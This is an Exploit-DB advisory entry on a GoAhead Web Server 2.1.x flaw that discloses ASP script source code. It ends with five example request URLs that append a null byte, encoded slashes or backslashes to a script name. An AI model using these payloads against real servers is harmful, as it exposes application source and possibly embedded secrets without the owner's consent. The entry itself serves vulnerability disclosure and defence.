GoAhead Web Server 2.1.x - '.ASP' File Source Code Disclosure

EDB-ID:

23446


Platform:

Windows

Published:

2002-12-17

source: http://www.securityfocus.com/bid/9239/info

A vulnerability in GoAhead webserver may result in the disclosure of the source code of ASP script files. The vulnerability occurs because the application fails to sanitize HTTP requests.

An attacker can append certain characters to the end of an HTTP request for a specific ASP file. As a result, GoAhead webserver will disclose the contents of the requested ASP script file to the attacker.

This issue affects GoAhead 2.1.7 and earlier. 

http://www.example.com/asp.asp%00
http://www.example.com/asp.asp%2f
http://www.example.com/asp.asp%5c
http://www.example.com/asp.asp/
http://www.example.com/asp.asp